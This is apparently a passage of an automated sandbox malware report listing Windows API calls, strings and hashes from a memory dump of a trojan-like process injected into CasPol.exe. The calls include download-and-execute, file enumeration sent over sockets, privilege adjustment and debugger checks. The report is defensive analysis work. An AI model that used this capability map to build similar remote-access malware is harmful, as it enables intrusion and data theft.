                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Service$CloseHandle$Open$ManagerStart
                                                                                                • String ID:
                                                                                                • API String ID: 276877138-0
                                                                                                • Opcode ID: af999b41650d3cd8b8f8fe088188ad5770f3288987236d92c8a0026e65871fc6
                                                                                                • Instruction ID: bfab90d9ddd5c2d56401b7e15998ac1c6a079cb4321381bf248b2ffa9e014974
                                                                                                • Opcode Fuzzy Hash: af999b41650d3cd8b8f8fe088188ad5770f3288987236d92c8a0026e65871fc6
                                                                                                • Instruction Fuzzy Hash: 60F0E9715403146FD2115B31EC88DBF2A6CDF85BB2B01002EF442A3191CF78CD4995B5
                                                                                                APIs
                                                                                                  • Part of subcall function 004470CF: GetLastError.KERNEL32(?,?,0043952C,?,00000000,?,0043BB65,00000000,00000000), ref: 004470D3
                                                                                                  • Part of subcall function 004470CF: _free.LIBCMT ref: 00447106
                                                                                                  • Part of subcall function 004470CF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00447147
                                                                                                  • Part of subcall function 004470CF: _abort.LIBCMT ref: 0044714D
                                                                                                • IsValidCodePage.KERNEL32(00000000), ref: 00450D71
                                                                                                • _wcschr.LIBVCRUNTIME ref: 00450E01
                                                                                                • _wcschr.LIBVCRUNTIME ref: 00450E0F
                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,?,00000000,?), ref: 00450EB2
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                                                                • String ID: (E
                                                                                                • API String ID: 4212172061-542121585
                                                                                                • Opcode ID: dcd57c1fc5b938733d480149ec8b19a4321ed510edb30894bc8310657ac495ef
                                                                                                • Instruction ID: 16e6850baad922d2e300dda2121b2fdf61a8ef58a3873fa5b3432b878cecddba
                                                                                                • Opcode Fuzzy Hash: dcd57c1fc5b938733d480149ec8b19a4321ed510edb30894bc8310657ac495ef
                                                                                                • Instruction Fuzzy Hash: A361FC7A500306AAD725AB75CC42ABB73A8EF44316F14082FFD05D7243EB78E949C769
                                                                                                APIs
                                                                                                  • Part of subcall function 00416C9D: GetCurrentProcess.KERNEL32(00000028,?), ref: 00416CAA
                                                                                                  • Part of subcall function 00416C9D: OpenProcessToken.ADVAPI32(00000000), ref: 00416CB1
                                                                                                  • Part of subcall function 00416C9D: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416CC3
                                                                                                  • Part of subcall function 00416C9D: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416CE2
                                                                                                  • Part of subcall function 00416C9D: GetLastError.KERNEL32 ref: 00416CE8
                                                                                                • ExitWindowsEx.USER32(00000000,00000001), ref: 00415AF3
                                                                                                • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 00415B08
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00415B0F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                                                                • String ID: PowrProf.dll$SetSuspendState
                                                                                                • API String ID: 1589313981-1420736420
                                                                                                • Opcode ID: 7fadfb1035a0594faa0ac3b134632791a047f758a37044af90fcf021a8a11910
                                                                                                • Instruction ID: be3657bdb4b9c596b700244bf1edaf45c421fe256a6f88bebcc25452880e9c8a
                                                                                                • Opcode Fuzzy Hash: 7fadfb1035a0594faa0ac3b134632791a047f758a37044af90fcf021a8a11910
                                                                                                • Instruction Fuzzy Hash: 84215E71644741A6CB14FBB198A6AFF22599F80748F40483FB442771D2EF7CE889865E
                                                                                                APIs
                                                                                                • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 0045148C
                                                                                                • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002), ref: 004514B5
                                                                                                • GetACP.KERNEL32 ref: 004514CA
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: InfoLocale
                                                                                                • String ID: ACP$OCP
                                                                                                • API String ID: 2299586839-711371036
                                                                                                • Opcode ID: 7de529321666405c3dbd177549b20e94864b34fdb637d578d31b634f87125a95
                                                                                                • Instruction ID: 27270ea0035267e4249f05f4639a08e7e92d7e6a6a5113c6df6fa5280cb26525
                                                                                                • Opcode Fuzzy Hash: 7de529321666405c3dbd177549b20e94864b34fdb637d578d31b634f87125a95
                                                                                                • Instruction Fuzzy Hash: 0821C731600100B7DB308F54C901FA773A6AF52B67F5A9566EC0AD7223EB3ADD49C399
                                                                                                APIs
                                                                                                • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041A85B
                                                                                                • LoadResource.KERNEL32(00000000,?,?,0040E25B,00000000), ref: 0041A86F
                                                                                                • LockResource.KERNEL32(00000000,?,?,0040E25B,00000000), ref: 0041A876
                                                                                                • SizeofResource.KERNEL32(00000000,?,?,0040E25B,00000000), ref: 0041A885
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Resource$FindLoadLockSizeof
                                                                                                • String ID: SETTINGS
                                                                                                • API String ID: 3473537107-594951305
                                                                                                • Opcode ID: af91fd7a50235684c3f0857021386823e2c7131a01440ecb0520647964aa65c6
                                                                                                • Instruction ID: 1fe06f9b0c9a023904624b9b61caa7bd4c13f92b8b5c35c0d543cfa28092256f
                                                                                                • Opcode Fuzzy Hash: af91fd7a50235684c3f0857021386823e2c7131a01440ecb0520647964aa65c6
                                                                                                • Instruction Fuzzy Hash: DAE01A76240720ABCB211BA1BD4CD073E39F7867637000039F549A2221CE75CC52CB29
                                                                                                APIs
                                                                                                • __EH_prolog.LIBCMT ref: 00407A91
                                                                                                • FindFirstFileW.KERNEL32(00000000,?,00466AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                                                                                                • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                                                                                                • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407C76
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Find$File$CloseFirstH_prologNext
                                                                                                • String ID:
                                                                                                • API String ID: 1157919129-0
                                                                                                • Opcode ID: 5746a69bc694a0666f4b62bcf8e24c63090826625a2ba26db4081967b1150617
                                                                                                • Instruction ID: e1cc7e471fba1e38487cd482a49156f4879f85d64aa43a49cb1f79655cfb0c65
                                                                                                • Opcode Fuzzy Hash: 5746a69bc694a0666f4b62bcf8e24c63090826625a2ba26db4081967b1150617
                                                                                                • Instruction Fuzzy Hash: 325162729001085ACB14FBA5DD969ED7B78AF50318F50417FB806B31D2EF3CAB498B99
                                                                                                APIs
                                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406234
                                                                                                • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 00406318
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: DownloadExecuteFileShell
                                                                                                • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$open
                                                                                                • API String ID: 2825088817-4197237851
                                                                                                • Opcode ID: 2df85d5c2dacd2a69264a0d90ee333b3657f8fa02963e4ef8179e8c5c6258837
                                                                                                • Instruction ID: e32f65eb076a11421f0b28df520d432f118a03887cfea0ef8c7e4d0a3f62d172
                                                                                                • Opcode Fuzzy Hash: 2df85d5c2dacd2a69264a0d90ee333b3657f8fa02963e4ef8179e8c5c6258837
                                                                                                • Instruction Fuzzy Hash: E361CF3160430067CA14FA76D8569BE37A59F81718F01493FBC46772E6EF3CAA05C69B
                                                                                                APIs
                                                                                                • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406ADD
                                                                                                • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406BA5
                                                                                                  • Part of subcall function 00404468: send.WS2_32(00000270,00000000,00000000,00000000), ref: 004044FD
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: FileFind$FirstNextsend
                                                                                                • String ID: pPG$pPG
                                                                                                • API String ID: 4113138495-3204143781
                                                                                                • Opcode ID: e142a87585a757cda3ef1077b5de62228bdf8071b3f1f422dde6a6eebde7f95e
                                                                                                • Instruction ID: b94dab712156e78be0f8cc3bef15d45c6a114b58aade1ae888b20ae253cfdc5a
                                                                                                • Opcode Fuzzy Hash: e142a87585a757cda3ef1077b5de62228bdf8071b3f1f422dde6a6eebde7f95e
                                                                                                • Instruction Fuzzy Hash: F42187715043015BC714FB61DC95DEF77A8AF90318F40093EF996A31E1EF38AA08CA9A
                                                                                                APIs
                                                                                                • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BE77
                                                                                                  • Part of subcall function 004127AA: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004127B9
                                                                                                  • Part of subcall function 004127AA: RegSetValueExA.KERNEL32(?,XwF,00000000,?,00000000,00000000,00475308,?,?,0040E6D3,00467758,6.0.0 Pro), ref: 004127E1
                                                                                                  • Part of subcall function 004127AA: RegCloseKey.KERNEL32(?,?,?,0040E6D3,00467758,6.0.0 Pro), ref: 004127EC
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseCreateInfoParametersSystemValue
                                                                                                • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                                                • API String ID: 4127273184-3576401099
                                                                                                • Opcode ID: 66458e8cc3153e1574d54a22ceeec595ae1d5fb91ba42e72fdc85762ed94257a
                                                                                                • Instruction ID: 3b74369dcb7a8544f1b55df16a592c3d868ba554001bd6a4c71ed5c97b6fc17b
                                                                                                • Opcode Fuzzy Hash: 66458e8cc3153e1574d54a22ceeec595ae1d5fb91ba42e72fdc85762ed94257a
                                                                                                • Instruction Fuzzy Hash: F5112132B8035033D518313A5E67BBF2816D34AB60F55415FB6066A6CAFADE4AA103DF
                                                                                                APIs
                                                                                                • __EH_prolog.LIBCMT ref: 00408DAC
                                                                                                • FindFirstFileW.KERNEL32(00000000,?), ref: 00408E24
                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 00408E4D
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: FileFind$FirstH_prologNext
                                                                                                • String ID:
                                                                                                • API String ID: 301083792-0
                                                                                                • Opcode ID: 6c4e05bbd676998823013bb95e1988c3a5c0f97e24fecd488042c813a11282fd
                                                                                                • Instruction ID: 402ed7a5658d2f2a6adb961a0daa6f616ba37c5e7974c2bf040f6c8ce137202a
                                                                                                • Opcode Fuzzy Hash: 6c4e05bbd676998823013bb95e1988c3a5c0f97e24fecd488042c813a11282fd
                                                                                                • Instruction Fuzzy Hash: 127141728001199BCB15EBA1DC919EE7778AF54314F10427FE846B71E2EF385E49CB98
                                                                                                APIs
                                                                                                • _free.LIBCMT ref: 00448277
                                                                                                  • Part of subcall function 00446CD5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FC60,0000000A,00000000,0000000A,00000000,?,0044FF04,0000000A,00000007,0000000A,?,00450415,0000000A), ref: 00446CEB
                                                                                                  • Part of subcall function 00446CD5: GetLastError.KERNEL32(0000000A,?,0044FC60,0000000A,00000000,0000000A,00000000,?,0044FF04,0000000A,00000007,0000000A,?,00450415,0000000A,0000000A), ref: 00446CFD
                                                                                                • GetTimeZoneInformation.KERNEL32 ref: 00448289
                                                                                                • WideCharToMultiByte.KERNEL32(00000000,?,0047279C,000000FF,?,0000003F,?,?), ref: 00448301
                                                                                                • WideCharToMultiByte.KERNEL32(00000000,?,004727F0,000000FF,?,0000003F,?,?,?,0047279C,000000FF,?,0000003F,?,?), ref: 0044832E
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone_free
                                                                                                • String ID:
                                                                                                • API String ID: 806657224-0
                                                                                                • Opcode ID: 19c7acd3c199f22d3cb7e6366532db59579824ff8816259e0e4b7be5ccd06bfe
                                                                                                • Instruction ID: 51a0df1beadfd175f23f317ccc42380fbea08efb17929679258b12983fd701b8
                                                                                                • Opcode Fuzzy Hash: 19c7acd3c199f22d3cb7e6366532db59579824ff8816259e0e4b7be5ccd06bfe
                                                                                                • Instruction Fuzzy Hash: 2331FE70804205DFEB04DFA8CE8187EBBB8FF05B10B1442AFE454AB2A1DBB58D41CB58
                                                                                                APIs
                                                                                                  • Part of subcall function 004470CF: GetLastError.KERNEL32(?,?,0043952C,?,00000000,?,0043BB65,00000000,00000000), ref: 004470D3
                                                                                                  • Part of subcall function 004470CF: _free.LIBCMT ref: 00447106
                                                                                                  • Part of subcall function 004470CF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00447147
                                                                                                  • Part of subcall function 004470CF: _abort.LIBCMT ref: 0044714D
                                                                                                  • Part of subcall function 004470CF: _free.LIBCMT ref: 0044712E
                                                                                                  • Part of subcall function 004470CF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 0044713B
                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004510CE
                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0045111F
                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004511DF
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorInfoLastLocale$_free$_abort
                                                                                                • String ID:
                                                                                                • API String ID: 2829624132-0
                                                                                                • Opcode ID: abcc14db9f149b1caf6b1b84512261750d23d69a4869601b084c51f8d9e54295
                                                                                                • Instruction ID: aee342ac21436657f5846041838c3bd09d84a4d920a4c2a145562aed062da8a9
                                                                                                • Opcode Fuzzy Hash: abcc14db9f149b1caf6b1b84512261750d23d69a4869601b084c51f8d9e54295
                                                                                                • Instruction Fuzzy Hash: F661D8719005079BDB289F25CC82B7677A8EF04306F1041BBFD05D66A2EB78D949DB58
                                                                                                APIs
                                                                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 100061DA
                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 100061E4
                                                                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 100061F1
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4108479926.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4108117762.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4108479926.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                • String ID:
                                                                                                • API String ID: 3906539128-0
                                                                                                • Opcode ID: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                                                                                                • Instruction ID: da4494ed88e82f72bec2981ffd8ad716d5acf317cb547f21db02b9c2842d332f
                                                                                                • Opcode Fuzzy Hash: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                                                                                                • Instruction Fuzzy Hash: 4A31D37490122C9BEB21DF24DD88B8DBBB8EF08350F5041DAE81CA7265E7709F818F55
                                                                                                APIs
                                                                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,0000000A), ref: 0043A965
                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0000000A), ref: 0043A96F
                                                                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,0000000A), ref: 0043A97C
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                • String ID:
                                                                                                • API String ID: 3906539128-0
                                                                                                • Opcode ID: af6e046c0509c32b3386d0bc76265e00dd1467fe013a3816057f721e951f2d82
                                                                                                • Instruction ID: 2e36d9e0b5662236be867d7d52d6a22dc3a0b47d07fc7de068387a758ceea7c7
                                                                                                • Opcode Fuzzy Hash: af6e046c0509c32b3386d0bc76265e00dd1467fe013a3816057f721e951f2d82
                                                                                                • Instruction Fuzzy Hash: E731D6B491131CABCB21DF24D98978DB7B8BF08311F5051EAE80CA7251EB749F818F49
                                                                                                APIs
                                                                                                • GetCurrentProcess.KERNEL32(?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004AD5
                                                                                                • TerminateProcess.KERNEL32(00000000,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004ADC
                                                                                                • ExitProcess.KERNEL32 ref: 10004AEE
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4108479926.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4108117762.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4108479926.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: Process$CurrentExitTerminate
                                                                                                • String ID:
                                                                                                • API String ID: 1703294689-0
                                                                                                • Opcode ID: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                                                                                                • Instruction ID: 67c7ca3480f18a9b01e05da0926f82de4ad888d39fdd55e1be860e0f4a97641b
                                                                                                • Opcode Fuzzy Hash: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                                                                                                • Instruction Fuzzy Hash: 04E04676000218AFEF01BF25CD48B493B6AEF013C1F128010F9088B029CB35ED52CA68
                                                                                                APIs
                                                                                                • GetCurrentProcess.KERNEL32(?,?,0044273A,?,0046EAF0,0000000C,00442891,?,00000002,00000000), ref: 00442785
                                                                                                • TerminateProcess.KERNEL32(00000000,?,0044273A,?,0046EAF0,0000000C,00442891,?,00000002,00000000), ref: 0044278C
                                                                                                • ExitProcess.KERNEL32 ref: 0044279E
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Process$CurrentExitTerminate
                                                                                                • String ID:
                                                                                                • API String ID: 1703294689-0
                                                                                                • Opcode ID: 580307e7f9ed19ccdf9c10412063d8ea8bc62da0884c48fe7532ae208af4f440
                                                                                                • Instruction ID: c8bd48e99420b6c7b8697c64d03bd4ba31791432aa3bec6fd876c0c539ce8582
                                                                                                • Opcode Fuzzy Hash: 580307e7f9ed19ccdf9c10412063d8ea8bc62da0884c48fe7532ae208af4f440
                                                                                                • Instruction Fuzzy Hash: 7EE04F31000704AFEF016F10DD099493F29EF50396F448469F90896132CF79DC42CA48
                                                                                                APIs
                                                                                                • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,0041525B,00000000), ref: 0041AED7
                                                                                                • NtSuspendProcess.NTDLL(00000000), ref: 0041AEE4
                                                                                                • CloseHandle.KERNEL32(00000000,?,?,0041525B,00000000), ref: 0041AEED
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Process$CloseHandleOpenSuspend
                                                                                                • String ID:
                                                                                                • API String ID: 1999457699-0
                                                                                                • Opcode ID: 3b5e723eaf058cf4912863f44fffedc3e3ae8a4bfc071aeb07fd662f2e304fa3
                                                                                                • Instruction ID: cbdad53ed629db76d40e0897fbdb217e77766e02faa6d5bf56048ccc5fb15ac5
                                                                                                • Opcode Fuzzy Hash: 3b5e723eaf058cf4912863f44fffedc3e3ae8a4bfc071aeb07fd662f2e304fa3
                                                                                                • Instruction Fuzzy Hash: 80D05E32500222638220176A7C0D997EE68DBC1AB2702416AF404D22219E30C88186A9
                                                                                                APIs
                                                                                                • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,00415280,00000000), ref: 0041AF03
                                                                                                • NtResumeProcess.NTDLL(00000000), ref: 0041AF10
                                                                                                • CloseHandle.KERNEL32(00000000,?,?,00415280,00000000), ref: 0041AF19
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Process$CloseHandleOpenResume
                                                                                                • String ID:
                                                                                                • API String ID: 3614150671-0
                                                                                                • Opcode ID: 6d31317880465a65d63f867429a7c123c2a1788788c54349cbb6221ea43f3537
                                                                                                • Instruction ID: 5834692e6dbfc7302e0627ffd9745f57241b902771746b5adb28784224297b78
                                                                                                • Opcode Fuzzy Hash: 6d31317880465a65d63f867429a7c123c2a1788788c54349cbb6221ea43f3537
                                                                                                • Instruction Fuzzy Hash: 7CD05E32504121638220176A6C0D997ED68DBC5AB3702422AF504D22219E30C881C6A8
                                                                                                APIs
                                                                                                • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004477FA
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
